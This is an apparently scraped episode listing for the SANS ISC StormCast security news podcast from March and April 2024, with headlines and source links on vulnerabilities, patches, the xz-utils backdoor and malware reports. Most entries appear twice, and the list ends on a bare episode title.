Quick Palo Alto Networks Global Protect Vulnerablity Update CVE-2024-3400 https://isc.sans.edu/diary/30838 Delinea patches critical vulnerability in secret manager https://trust.delinea.com/?tcuUid=17aaf4ef-ada9-46d5-bf97-abd3b07daae3 Lancom Windows Setup Assistant May Reset Password https://www.lancom-systems.com/service-support/general-security-information PHP Patches https://seclists.org/oss-sec/2024/q2/113 Duo SMS and VoiP Logs Leaked https://app.securitymsp.cisco.com/e/es?e=2785&eid=opguvrs&elq=bd1c1886a59e40c09915b029a74be94e Lastpass Stops Deepfake Attack https://blog.lastpass.com/posts/2024/04/attempted-audio-deepfake-call-targets-lastpass-employee
4/16/20246 minutes, 17 seconds
Episode Artwork

ISC StormCast for Sunday, April 14th, 2024

Palo Alto Networks GlobalProtect 0-Day CVE-2024-3400 https://security.paloaltonetworks.com/CVE-2024-3400 https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/#RespondingToCompromise
4/13/20245 minutes, 41 seconds
Episode Artwork

ISC StormCast for Sunday, April 14th, 2024

Palo Alto Networks GlobalProtect 0-Day CVE-2024-3400 https://security.paloaltonetworks.com/CVE-2024-3400 https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/#RespondingToCompromise
4/13/20245 minutes, 41 seconds
Episode Artwork

ISC StormCast for Friday, April 12th, 2024

BatBadBut: You can't securely execute commands on Windows https://flatt.tech/research/posts/batbadbut-you-cant-securely-execute-commands-on-windows/ FortiClient Linux Remote Code Execution https://www.fortiguard.com/psirt/FG-IR-23-087 Apple Threat Notifications and Protecting Against Mercenary Spyware https://support.apple.com/en-us/102174 New Technique to Trick Developers Detected in an Open Source Supply Chain Attack https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
4/12/20246 minutes, 11 seconds
Episode Artwork

ISC StormCast for Friday, April 12th, 2024

BatBadBut: You can't securely execute commands on Windows https://flatt.tech/research/posts/batbadbut-you-cant-securely-execute-commands-on-windows/ FortiClient Linux Remote Code Execution https://www.fortiguard.com/psirt/FG-IR-23-087 Apple Threat Notifications and Protecting Against Mercenary Spyware https://support.apple.com/en-us/102174 New Technique to Trick Developers Detected in an Open Source Supply Chain Attack https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
4/12/20246 minutes, 11 seconds
Episode Artwork

ISC StormCast for Thursday, April 11th, 2024

Rust Command API code execution vulnerability CVE-2024-24576 https://blog.rust-lang.org/2024/04/09/cve-2024-24576.html Adobe Updates: Magento Adobe Commerce CVE-2024-20759 CVE-2024-20758 https://helpx.adobe.com/security/products/magento/apsb24-18.html https://helpx.adobe.com/security.html Fortinet FortiOS And FortiProxy Vulnerability CVE-2023-41677 https://www.fortiguard.com/psirt/FG-IR-23-493 Smoke and Screen Mirrors Signed Backdoor CVE-2024-26234 https://news.sophos.com/en-us/2024/04/09/smoke-and-screen-mirrors-a-strange-signed-backdoor/
4/11/20245 minutes, 59 seconds
Episode Artwork

ISC StormCast for Thursday, April 11th, 2024

Rust Command API code execution vulnerability CVE-2024-24576 https://blog.rust-lang.org/2024/04/09/cve-2024-24576.html Adobe Updates: Magento Adobe Commerce CVE-2024-20759 CVE-2024-20758 https://helpx.adobe.com/security/products/magento/apsb24-18.html https://helpx.adobe.com/security.html Fortinet FortiOS And FortiProxy Vulnerability CVE-2023-41677 https://www.fortiguard.com/psirt/FG-IR-23-493 Smoke and Screen Mirrors Signed Backdoor CVE-2024-26234 https://news.sophos.com/en-us/2024/04/09/smoke-and-screen-mirrors-a-strange-signed-backdoor/
4/11/20245 minutes, 59 seconds
Episode Artwork

ISC StormCast for Wednesday, April 10th, 2024

Microsoft Patches https://isc.sans.edu/forums/diary/April%202024%20Microsoft%20Patch%20Tuesday%20Summary/30822/ D-Link NAS Backdoor https://github.com/netsecfish/dlink LG SmartTV Vulnerabilities https://www.bitdefender.com/blog/labs/vulnerabilities-identified-in-lg-webos/
4/10/20246 minutes, 31 seconds
Episode Artwork

ISC StormCast for Wednesday, April 10th, 2024

Microsoft Patches https://isc.sans.edu/forums/diary/April%202024%20Microsoft%20Patch%20Tuesday%20Summary/30822/ D-Link NAS Backdoor https://github.com/netsecfish/dlink LG SmartTV Vulnerabilities https://www.bitdefender.com/blog/labs/vulnerabilities-identified-in-lg-webos/
4/10/20246 minutes, 31 seconds
Episode Artwork

ISC StormCast for Tuesday, April 9th, 2024

A Use Case for Adding Threat Hunting to Your Security Operations Team. https://isc.sans.edu/diary/30816 Notepad++ Parasite Site https://notepad-plus-plus.org/news/help-to-take-down-parasite-site/ Hugging Face Pickle File Vulnerablities https://huggingface.co/blog/hugging-face-wiz-security-blog Google Considers V8 Sandbox no longer experimental https://v8.dev/blog/sandbox
4/9/20245 minutes, 59 seconds
Episode Artwork

ISC StormCast for Tuesday, April 9th, 2024

A Use Case for Adding Threat Hunting to Your Security Operations Team. https://isc.sans.edu/diary/30816 Notepad++ Parasite Site https://notepad-plus-plus.org/news/help-to-take-down-parasite-site/ Hugging Face Pickle File Vulnerablities https://huggingface.co/blog/hugging-face-wiz-security-blog Google Considers V8 Sandbox no longer experimental https://v8.dev/blog/sandbox
4/9/20245 minutes, 59 seconds
Episode Artwork

ISC StormCast for Monday, April 8th, 2024

Heartbleed 10th Anniversary https://heartbleed.com/ Possible Libarchive Backdoor Vulnerability https://github.com/libarchive/libarchive/pull/1609 Magento XML Backdoor https://sansec.io/research/magento-xml-backdoor Google Public DNS's approach to fight against cache poisoning attacks https://security.googleblog.com/2024/03/google-public-dnss-approach-to-fight.html Remote code execution (RCE)vulnerability in Brocade Fabric OS (CVE-2023-3454) https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/23215 SANS London April Evening Talk https://sans.zoom.us/webinar/register/WN_ZLLnQKCCQCywLGm-CM4xQg#/registration
4/8/20245 minutes, 29 seconds
Episode Artwork

ISC StormCast for Monday, April 8th, 2024

Heartbleed 10th Anniversary https://heartbleed.com/ Possible Libarchive Backdoor Vulnerability https://github.com/libarchive/libarchive/pull/1609 Magento XML Backdoor https://sansec.io/research/magento-xml-backdoor Google Public DNS's approach to fight against cache poisoning attacks https://security.googleblog.com/2024/03/google-public-dnss-approach-to-fight.html Remote code execution (RCE)vulnerability in Brocade Fabric OS (CVE-2023-3454) https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/23215 SANS London April Evening Talk https://sans.zoom.us/webinar/register/WN_ZLLnQKCCQCywLGm-CM4xQg#/registration
4/8/20245 minutes, 29 seconds
Episode Artwork

ISC StormCast for Friday, April 5th, 2024

Slicing up DoNex with Binary Ninja https://isc.sans.edu/diary/Slicing%20up%20DoNex%20with%20Binary%20Ninja/30812 HTTP/2 Continuation Flood https://nowotarski.info/http2-continuation-flood-technical-details/ Dangers of CSS in HTML Email https://lutrasecurity.com/en/articles/kobold-letters/ Dan Mazella: Infostealers in Automotive Headunits https://www.sans.edu/cyber-research/exploring-infostealer-malware-techniques-automotive-head-units/
4/5/202415 minutes, 11 seconds
Episode Artwork

ISC StormCast for Friday, April 5th, 2024

Slicing up DoNex with Binary Ninja https://isc.sans.edu/diary/Slicing%20up%20DoNex%20with%20Binary%20Ninja/30812 HTTP/2 Continuation Flood https://nowotarski.info/http2-continuation-flood-technical-details/ Dangers of CSS in HTML Email https://lutrasecurity.com/en/articles/kobold-letters/ Dan Mazzella: Infostealers in Automotive Headunits https://www.sans.edu/cyber-research/exploring-infostealer-malware-techniques-automotive-head-units/
4/5/202415 minutes, 11 seconds
Episode Artwork

ISC StormCast for Thursday, April 4th, 2024

Playing with xzbot: Some things you can learn from SSH traffic https://isc.sans.edu/forums/diary/Some%20things%20you%20can%20learn%20from%20SSH%20traffic/30808/ Google Proposes Device Bound Session Credentials (DBSC) https://blog.chromium.org/2024/04/fighting-cookie-theft-using-device.html Four More Ivanti Vulnerabilities https://forums.ivanti.com/s/article/SA-CVE-2024-21894-Heap-Overflow-CVE-2024-22052-Null-Pointer-Dereference-CVE-2024-22053-Heap-Overflow-and-CVE-2024-22023-XML-entity-expansion-or-XXE-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US Google Pixel Zero Day https://source.android.com/docs/security/bulletin/pixel/2024-04-01
4/4/20246 minutes, 2 seconds
Episode Artwork

ISC StormCast for Thursday, April 4th, 2024

Playing with xzbot: Some things you can learn from SSH traffic https://isc.sans.edu/forums/diary/Some%20things%20you%20can%20learn%20from%20SSH%20traffic/30808/ Google Proposes Device Bound Session Credentials (DBSC) https://blog.chromium.org/2024/04/fighting-cookie-theft-using-device.html Four More Ivanti Vulnerabilities https://forums.ivanti.com/s/article/SA-CVE-2024-21894-Heap-Overflow-CVE-2024-22052-Null-Pointer-Dereference-CVE-2024-22053-Heap-Overflow-and-CVE-2024-22023-XML-entity-expansion-or-XXE-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US Google Pixel Zero Day https://source.android.com/docs/security/bulletin/pixel/2024-04-01
4/4/20246 minutes, 2 seconds
Episode Artwork

ISC StormCast for Wednesday, April 3rd, 2024

Chrome Incognito Mode Settlement https://www.wired.com/story/google-chrome-incognito-mode-data-deletion-settlement/ Google E-Mail Sender Guidelines FAQ https://support.google.com/a/answer/14229414?hl=en&fl=1&sjid=2270464422796374445-NC Cisco Updates and VPN Best Practices https://www.cisco.com/c/en/us/support/docs/security/secure-firewall-threat-defense/221806-password-spray-attacks-impacting-custome.html https://sec.cloudapps.cisco.com/security/center/publicationListing.x Apache Pulsar Vulnerability https://pulsar.apache.org/security/CVE-2024-29834/ Progress Flowmon Network Monitoring Tool Vulnerability CVE-2024-2389 https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability Wait Just an Infosec Episode with Bojan Zdrnja: Thursday April 4th 2024 10:00 EDST https://isc.sans.edu/j/xzutils (link will redirect once episode is live)
4/3/20245 minutes, 39 seconds
Episode Artwork

ISC StormCast for Wednesday, April 3rd, 2024

Chrome Incognito Mode Settlement https://www.wired.com/story/google-chrome-incognito-mode-data-deletion-settlement/ Google E-Mail Sender Guidelines FAQ https://support.google.com/a/answer/14229414?hl=en&fl=1&sjid=2270464422796374445-NC Cisco Updates and VPN Best Practices https://www.cisco.com/c/en/us/support/docs/security/secure-firewall-threat-defense/221806-password-spray-attacks-impacting-custome.html https://sec.cloudapps.cisco.com/security/center/publicationListing.x Apache Pulsar Vulnerability https://pulsar.apache.org/security/CVE-2024-29834/ Progress Flowmon Network Monitoring Tool Vulnerability CVE-2024-2389 https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability Wait Just an Infosec Episode with Bojan Zdrnja: Thursday April 4th 2024 10:00 EDST https://isc.sans.edu/j/xzutils (link will redirect once episode is live)
4/3/20245 minutes, 39 seconds
Episode Artwork

ISC StormCast for Tuesday, April 2nd, 2024

The amazingly scary xz sshd backdoor https://isc.sans.edu/diary/The%20amazingly%20scary%20xz%20sshd%20backdoor/30802 The xz-utils backdoor in security advisories by national CSIRTs https://isc.sans.edu/diary/The+xzutils+backdoor+in+security+advisories+by+national+CSIRTs/30800 Checking CSV Files https://isc.sans.edu/diary/Checking%20CSV%20Files/30796 Infostealers Pose Threat to macOS https://www.jamf.com/blog/infostealers-pose-threat-to-macos/
4/2/20247 minutes, 9 seconds
Episode Artwork

ISC StormCast for Tuesday, April 2nd, 2024

The amazingly scary xz sshd backdoor https://isc.sans.edu/diary/The%20amazingly%20scary%20xz%20sshd%20backdoor/30802 The xz-utils backdoor in security advisories by national CSIRTs https://isc.sans.edu/diary/The+xzutils+backdoor+in+security+advisories+by+national+CSIRTs/30800 Checking CSV Files https://isc.sans.edu/diary/Checking%20CSV%20Files/30796 Infostealers Pose Threat to macOS https://www.jamf.com/blog/infostealers-pose-threat-to-macos/
4/2/20247 minutes, 9 seconds
Episode Artwork

ISC StormCast for Monday, April 1st, 2024

xz-utils Backdoor CVE-2024-3094 https://www.openwall.com/lists/oss-security/2024/03/29/4 https://tukaani.org/xz-backdoor/ https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27 Backdoor reverse analysis https://bsky.app/profile/did:plc:x2nsupeeo52oznrmplwapppl/post/3kowjkx2njy2b YARA Rule https://github.com/byinarie/CVE-2024-3094-info/blob/main/CVE-2024-3094.yar Social Engineering Attempts to Include Backdoor in Distros https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708 https://news.ycombinator.com/item?id=39866275 Github Repo (now disabled) https://github.com/tukaani-project/xz Statements from Distributions https://www.kali.org/blog/about-the-xz-backdoor/ https://archlinux.org/news/the-xz-package-has-been-backdoored/ https://access.redhat.com/security/cve/CVE-2024-3094 https://bugs.gentoo.org/928134 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1068024
4/1/20247 minutes, 37 seconds
Episode Artwork

ISC StormCast for Monday, April 1st, 2024

xz-utils Backdoor CVE-2024-3094 https://www.openwall.com/lists/oss-security/2024/03/29/4 https://tukaani.org/xz-backdoor/ https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27 Backdoor reverse analysis https://bsky.app/profile/did:plc:x2nsupeeo52oznrmplwapppl/post/3kowjkx2njy2b YARA Rule https://github.com/byinarie/CVE-2024-3094-info/blob/main/CVE-2024-3094.yar Social Engineering Attempts to Include Backdoor in Distros https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708 https://news.ycombinator.com/item?id=39866275 Github Repo (now disabled) https://github.com/tukaani-project/xz Statements from Distributions https://www.kali.org/blog/about-the-xz-backdoor/ https://archlinux.org/news/the-xz-package-has-been-backdoored/ https://access.redhat.com/security/cve/CVE-2024-3094 https://bugs.gentoo.org/928134 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1068024
4/1/20247 minutes, 37 seconds
Episode Artwork

ISC StormCast for Friday, March 29th, 2024

From JavaScript to AsyncRAT https://isc.sans.edu/diary/From%20JavaScript%20to%20AsyncRAT/30788 TeamCity Patches https://www.jetbrains.com/privacy-security/issues-fixed/?product=TeamCity&version=2024.03 Okta Verify for Windows Auto-update Arbitrary Code Execution CVE-2024-0980 https://trust.okta.com/security-advisories/okta-verify-windows-auto-update-arbitrary-code-execution-cve-2024-0980/ Google Zero Day Report https://storage.googleapis.com/gweb-uniblog-publish-prod/documents/Year_in_Review_of_ZeroDays.pdf
3/29/20245 minutes, 36 seconds
Episode Artwork

ISC StormCast for Friday, March 29th, 2024

From JavaScript to AsyncRAT https://isc.sans.edu/diary/From%20JavaScript%20to%20AsyncRAT/30788 TeamCity Patches https://www.jetbrains.com/privacy-security/issues-fixed/?product=TeamCity&version=2024.03 Okta Verify for Windows Auto-update Arbitrary Code Execution CVE-2024-0980 https://trust.okta.com/security-advisories/okta-verify-windows-auto-update-arbitrary-code-execution-cve-2024-0980/ Google Zero Day Report https://storage.googleapis.com/gweb-uniblog-publish-prod/documents/Year_in_Review_of_ZeroDays.pdf
3/29/20245 minutes, 36 seconds
Episode Artwork

ISC StormCast for Thursday, March 28th, 2024

Scans for Apache OfBiz https://isc.sans.edu/diary/Scans%20for%20Apache%20OfBiz/30784 Wall-Escape (CVE-2024-28085) https://people.rit.edu/sjf5462/6831711781/wall_2_27_2024.txt Recent "MFA Bombing" Attacks Targeting Apple Users https://krebsonsecurity.com/2024/03/recent-mfa-bombing-attacks-targeting-apple-users/
3/28/20245 minutes, 20 seconds
Episode Artwork

ISC StormCast for Thursday, March 28th, 2024

Scans for Apache OfBiz https://isc.sans.edu/diary/Scans%20for%20Apache%20OfBiz/30784 Wall-Escape (CVE-2024-28085) https://people.rit.edu/sjf5462/6831711781/wall_2_27_2024.txt Recent "MFA Bombing" Attacks Targeting Apple Users https://krebsonsecurity.com/2024/03/recent-mfa-bombing-attacks-targeting-apple-users/
3/28/20245 minutes, 20 seconds
Episode Artwork

ISC StormCast for Wednesday, March 27th, 2024

New tool: linux-pkgs.sh https://isc.sans.edu/forums/diary/New%20tool%3A%20linux-pkgs.sh/30774/ Suspicious NuGet package grabs data from industrial systems https://www.reversinglabs.com/blog/suspicious-nuget-package-grabs-data-from-industrial-systems Preventing Cross Service UDP Loops in QUIC https://bughunters.google.com/blog/5960150648750080/preventing-cross-service-udp-loops-in-quic ShadowRay Attacks AI Workloads Actively Exploited in the Wild https://www.oligo.security/blog/shadowray-attack-ai-workloads-actively-exploited-in-the-wild TheMoon Malware Infects 6,000 ASUS Routers in 72 Hours for Proxy Service https://www.bleepingcomputer.com/news/security/themoon-malware-infects-6-000-asus-routers-in-72-hours-for-proxy-service/
3/27/20245 minutes, 48 seconds
Episode Artwork

ISC StormCast for Wednesday, March 27th, 2024

New tool: linux-pkgs.sh https://isc.sans.edu/forums/diary/New%20tool%3A%20linux-pkgs.sh/30774/ Suspicious NuGet package grabs data from industrial systems https://www.reversinglabs.com/blog/suspicious-nuget-package-grabs-data-from-industrial-systems Preventing Cross Service UDP Loops in QUIC https://bughunters.google.com/blog/5960150648750080/preventing-cross-service-udp-loops-in-quic ShadowRay Attacks AI Workloads Actively Exploited in the Wild https://www.oligo.security/blog/shadowray-attack-ai-workloads-actively-exploited-in-the-wild TheMoon Malware Infects 6,000 ASUS Routers in 72 Hours for Proxy Service https://www.bleepingcomputer.com/news/security/themoon-malware-infects-6-000-asus-routers-in-72-hours-for-proxy-service/
3/27/20245 minutes, 48 seconds
Episode Artwork

ISC StormCast for Tuesday, March 26th, 2024

Tool updates: le-hex-to-ip.py and sigs.py https://isc.sans.edu/diary/Tool%20updates%3A%20le-hex-to-ip.py%20and%20sigs.py/30772 Apple Updates for MacOS, iOS/iPadOS, visionOS; https://isc.sans.edu/diary/Apple%20Updates%20for%20MacOS%2C%20iOS%20iPadOS%20and%20visionOS/30778 Fake Python Infrastructure https://checkmarx.com/blog/over-170k-users-affected-by-attack-using-fake-python-infrastructure/ OpenVPN Update https://openvpn.net/community-downloads/
3/26/20246 minutes, 2 seconds
Episode Artwork

ISC StormCast for Tuesday, March 26th, 2024

Tool updates: le-hex-to-ip.py and sigs.py https://isc.sans.edu/diary/Tool%20updates%3A%20le-hex-to-ip.py%20and%20sigs.py/30772 Apple Updates for MacOS, iOS/iPadOS, visionOS; https://isc.sans.edu/diary/Apple%20Updates%20for%20MacOS%2C%20iOS%20iPadOS%20and%20visionOS/30778 Fake Python Infrastructure https://checkmarx.com/blog/over-170k-users-affected-by-attack-using-fake-python-infrastructure/ OpenVPN Update https://openvpn.net/community-downloads/
3/26/20246 minutes, 2 seconds
Episode Artwork

ISC StormCast for Monday, March 25th, 2024

1768.py's Experimental Mode https://isc.sans.edu/diary/1768.py%27s%20Experimental%20Mode/30770 CISCP Advisory on Application-Layer Loop DoS https://docs.google.com/document/d/1KByZzrdwQhrXGPPCf9tUzERZyRzg0xOpGbWoDURZxTI/edit Fixes for Windows Server LSASS Memory Leak https://www.catalog.update.microsoft.com/Search.aspx?q=2024-03%20Cumulative%20Update
3/25/20245 minutes, 31 seconds
Episode Artwork

ISC StormCast for Monday, March 25th, 2024

1768.py's Experimental Mode https://isc.sans.edu/diary/1768.py%27s%20Experimental%20Mode/30770 CISCP Advisory on Application-Layer Loop DoS https://docs.google.com/document/d/1KByZzrdwQhrXGPPCf9tUzERZyRzg0xOpGbWoDURZxTI/edit Fixes for Windows Server LSASS Memory Leak https://www.catalog.update.microsoft.com/Search.aspx?q=2024-03%20Cumulative%20Update
3/25/20245 minutes, 31 seconds
Episode Artwork

ISC StormCast for Friday, March 22nd, 2024

Geofeed https://isc.sans.edu/forums/diary/Whois%20%22geofeed%22%20Data/30766/ Apple Updates https://support.apple.com/en-us/HT201222 Apple Bug https://gofetch.fail/ GitHub Copilot AutoFix https://github.blog/2024-03-20-found-means-fixed-introducing-code-scanning-autofix-powered-by-github-copilot-and-codeql/ Fortinet PoC https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-48788-fortinet-forticlientems-sql-injection-deep-dive/ Ivanti Standalone Sentry https://forums.ivanti.com/s/article/KB-CVE-2023-41724-Remote-Code-Execution-for-Ivanti-Standalone-Sentry?language=en_US
3/22/20246 minutes, 24 seconds
Episode Artwork

ISC StormCast for Friday, March 22nd, 2024

Geofeed https://isc.sans.edu/forums/diary/Whois%20%22geofeed%22%20Data/30766/ Apple Updates https://support.apple.com/en-us/HT201222 Apple Bug https://gofetch.fail/ GitHub Copilot AutoFix https://github.blog/2024-03-20-found-means-fixed-introducing-code-scanning-autofix-powered-by-github-copilot-and-codeql/ Fortinet PoC https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-48788-fortinet-forticlientems-sql-injection-deep-dive/ Ivanti Standalone Sentry https://forums.ivanti.com/s/article/KB-CVE-2023-41724-Remote-Code-Execution-for-Ivanti-Standalone-Sentry?language=en_US
3/22/20246 minutes, 24 seconds
Episode Artwork

ISC StormCast for Thursday, March 21st, 2024

Scans for the Fortinet FortiOS CVE-2024-21762 Vulnerability https://isc.sans.edu/diary/Scans%20for%20Fortinet%20FortiOS%20and%20the%20CVE-2024-21762%20vulnerability/30762 Microsoft Reminder: It is Tax Season (at least in the US) https://www.theregister.com/2024/03/20/its_tax_season_and_scammers/ Abusing DHCP Administrators Group for Privilege Escalation in Windows Domains; https://www.akamai.com/blog/security-research/abusing-dhcp-administrators-group-for-privilege-escalation-in-windows-domains
3/21/20245 minutes, 56 seconds
Episode Artwork

ISC StormCast for Thursday, March 21st, 2024

Scans for the Fortinet FortiOS CVE-2024-21762 Vulnerability https://isc.sans.edu/diary/Scans%20for%20Fortinet%20FortiOS%20and%20the%20CVE-2024-21762%20vulnerability/30762 Microsoft Reminder: It is Tax Season (at least in the US) https://www.theregister.com/2024/03/20/its_tax_season_and_scammers/ Abusing DHCP Administrators Group for Privilege Escalation in Windows Domains; https://www.akamai.com/blog/security-research/abusing-dhcp-administrators-group-for-privilege-escalation-in-windows-domains
3/21/20245 minutes, 56 seconds
Episode Artwork

ISC StormCast for Wednesday, March 20th, 2024

Attacker Hunting Firewalls https://isc.sans.edu/diary/Attacker%20Hunting%20Firewalls/30758 Fortigate Vulnerability Exploit Available https://github.com/h4x0r-dz/CVE-2024-21762 IC3 Annual Report 2023 https://www.ic3.gov/Media/PDF/AnnualReport/2023_IC3Report.pdf Issues with macOS 14.4 Update https://www.macrumors.com/2024/03/18/do-not-update-macos-sonoma-14-4/
3/20/20245 minutes, 25 seconds
Episode Artwork

ISC StormCast for Wednesday, March 20th, 2024

Attacker Hunting Firewalls https://isc.sans.edu/diary/Attacker%20Hunting%20Firewalls/30758 Fortigate Vulnerability Exploit Available https://github.com/h4x0r-dz/CVE-2024-21762 IC3 Annual Report 2023 https://www.ic3.gov/Media/PDF/AnnualReport/2023_IC3Report.pdf Issues with macOS 14.4 Update https://www.macrumors.com/2024/03/18/do-not-update-macos-sonoma-14-4/
3/20/20245 minutes, 25 seconds
Episode Artwork

ISC StormCast for Tuesday, March 19th, 2024

Microsoft announced deprecation of 1024 bit RSA Keys https://learn.microsoft.com/en-us/windows/whats-new/deprecated-features#deprecated-features Chrome Real-Time Safe Browsing Protection https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/ Fortra FileCatalyst Vulnerability CVE-2024-25153 https://www.fortra.com/security/advisory/fi-2024-002 Spring Security CVE-2024-22257 https://spring.io/security/cve-2024-22257/ TrendNet TWEW-827DRU Router Vulnerability CVE-2024-28353 CVE-2024-28354 https://warp-desk-89d.notion.site/TEW-827DRU-5c40fb20572148f0b00f329d69273791
3/19/20245 minutes, 23 seconds
Episode Artwork

ISC StormCast for Tuesday, March 19th, 2024

Microsoft announced deprecation of 1024 bit RSA Keys https://learn.microsoft.com/en-us/windows/whats-new/deprecated-features#deprecated-features Chrome Real-Time Safe Browsing Protection https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/ Fortra FileCatalyst Vulnerability CVE-2024-25153 https://www.fortra.com/security/advisory/fi-2024-002 Spring Security CVE-2024-22257 https://spring.io/security/cve-2024-22257/ TrendNet TWEW-827DRU Router Vulnerability CVE-2024-28353 CVE-2024-28354 https://warp-desk-89d.notion.site/TEW-827DRU-5c40fb20572148f0b00f329d69273791
3/19/20245 minutes, 23 seconds
Episode Artwork

ISC StormCast for Monday, March 18th, 2024

5GHoul Revisted: Thress Months Later https://isc.sans.edu/diary/5Ghoul%20Revisited%3A%20Three%20Months%20Later/30746 Obfuscated Hexadecimal Payload https://isc.sans.edu/diary/Obfuscated%20Hexadecimal%20Payload/30750 ChatGPT Related OAUTH Issues https://salt.security/blog/security-flaws-within-chatgpt-extensions-allowed-access-to-accounts-on-third-party-websites-and-sensitive-data?utm_source=social&utm_medium=reddit RedCanary Threat Detection Report https://redcanary.com/threat-detection-report/ CRL/OCSP Changes https://github.com/cabforum/servercert/blob/main/docs/BR.md
3/18/20246 minutes, 39 seconds
Episode Artwork

ISC StormCast for Monday, March 18th, 2024

5GHoul Revisted: Thress Months Later https://isc.sans.edu/diary/5Ghoul%20Revisited%3A%20Three%20Months%20Later/30746 Obfuscated Hexadecimal Payload https://isc.sans.edu/diary/Obfuscated%20Hexadecimal%20Payload/30750 ChatGPT Related OAUTH Issues https://salt.security/blog/security-flaws-within-chatgpt-extensions-allowed-access-to-accounts-on-third-party-websites-and-sensitive-data?utm_source=social&utm_medium=reddit RedCanary Threat Detection Report https://redcanary.com/threat-detection-report/ CRL/OCSP Changes https://github.com/cabforum/servercert/blob/main/docs/BR.md
3/18/20246 minutes, 39 seconds
Episode Artwork

ISC StormCast for Friday, March 15th, 2024

Increase in the number of phishing messages pointing to IPFS and to R2 buckets https://isc.sans.edu/diary/Increase%20in%20the%20number%20of%20phishing%20messages%20pointing%20to%20IPFS%20and%20to%20R2%20buckets/30744 Fortinet New Vulnerabilities https://www.horizon3.ai/attack-research/attack-blogs/fortiwlm-the-almost-story-for-the-forti-forty/ Fortinet Updates https://www.helpnetsecurity.com/2024/03/14/cve-2023-48788-poc/ Arcserve UDP Vulnerability and PoC https://www.tenable.com/security/research/tra-2024-07 Michael Holcomb: Mode Matters: Monitoring PLCs for Detecting Potential ICS/OT Incidents https://www.sans.edu/cyber-research/mode-matters-monitoring-plcs-for-detecting-potential-ics-ot-incidents/
3/15/202420 minutes, 37 seconds
Episode Artwork

ISC StormCast for Friday, March 15th, 2024

Increase in the number of phishing messages pointing to IPFS and to R2 buckets https://isc.sans.edu/diary/Increase%20in%20the%20number%20of%20phishing%20messages%20pointing%20to%20IPFS%20and%20to%20R2%20buckets/30744 Fortinet New Vulnerabilities https://www.horizon3.ai/attack-research/attack-blogs/fortiwlm-the-almost-story-for-the-forti-forty/ Fortinet Updates https://www.helpnetsecurity.com/2024/03/14/cve-2023-48788-poc/ Arcserve UDP Vulnerability and PoC https://www.tenable.com/security/research/tra-2024-07 Michael Holcomb: Mode Matters: Monitoring PLCs for Detecting Potential ICS/OT Incidents https://www.sans.edu/cyber-research/mode-matters-monitoring-plcs-for-detecting-potential-ics-ot-incidents/
3/15/202420 minutes, 37 seconds
Episode Artwork

ISC StormCast for Thursday, March 14th, 2024

Using ChatGPT to Deofuscate Malicious Scripts https://isc.sans.edu/diary/Using%20ChatGPT%20to%20Deobfuscate%20Malicious%20Scripts/30740 Critical Fortinet Vulnerabilities https://fortiguard.fortinet.com/psirt Adobe Security Bulletins https://helpx.adobe.com/security/security-bulletin.html Kubernetes Local Volumes Command Injection Vulnerability https://www.akamai.com/blog/security-research/kubernetes-local-volumes-command-injection-vulnerability-rce-system-privileges
3/14/20245 minutes, 28 seconds
Episode Artwork

ISC StormCast for Thursday, March 14th, 2024

Using ChatGPT to Deofuscate Malicious Scripts https://isc.sans.edu/diary/Using%20ChatGPT%20to%20Deobfuscate%20Malicious%20Scripts/30740 Critical Fortinet Vulnerabilities https://fortiguard.fortinet.com/psirt Adobe Security Bulletins https://helpx.adobe.com/security/security-bulletin.html Kubernetes Local Volumes Command Injection Vulnerability https://www.akamai.com/blog/security-research/kubernetes-local-volumes-command-injection-vulnerability-rce-system-privileges
3/14/20245 minutes, 28 seconds
Episode Artwork

ISC StormCast for Wednesday, March 13th, 2024

Microsoft Patch Tuesday March 2024 https://isc.sans.edu/diary/Microsoft%20Patch%20Tuesday%20-%20March%202024/30736 Death Knell of NVD https://resilientcyber.substack.com/p/death-knell-of-the-nvd Unrestricted file upload vulnerability in ManageEngine Desktop Central https://www.incibe.es/en/incibe-cert/notices/aviso/unrestricted-file-upload-vulnerability-manageengine-desktop-central Siemens Fire Protection System Updates https://cert-portal.siemens.com/productcert/html/ssa-225840.html
3/13/20245 minutes, 39 seconds
Episode Artwork

ISC StormCast for Wednesday, March 13th, 2024

Microsoft Patch Tuesday March 2024 https://isc.sans.edu/diary/Microsoft%20Patch%20Tuesday%20-%20March%202024/30736 Death Knell of NVD https://resilientcyber.substack.com/p/death-knell-of-the-nvd Unrestricted file upload vulnerability in ManageEngine Desktop Central https://www.incibe.es/en/incibe-cert/notices/aviso/unrestricted-file-upload-vulnerability-manageengine-desktop-central Siemens Fire Protection System Updates https://cert-portal.siemens.com/productcert/html/ssa-225840.html
3/13/20245 minutes, 39 seconds
Episode Artwork

ISC StormCast for Tuesday, March 12th, 2024

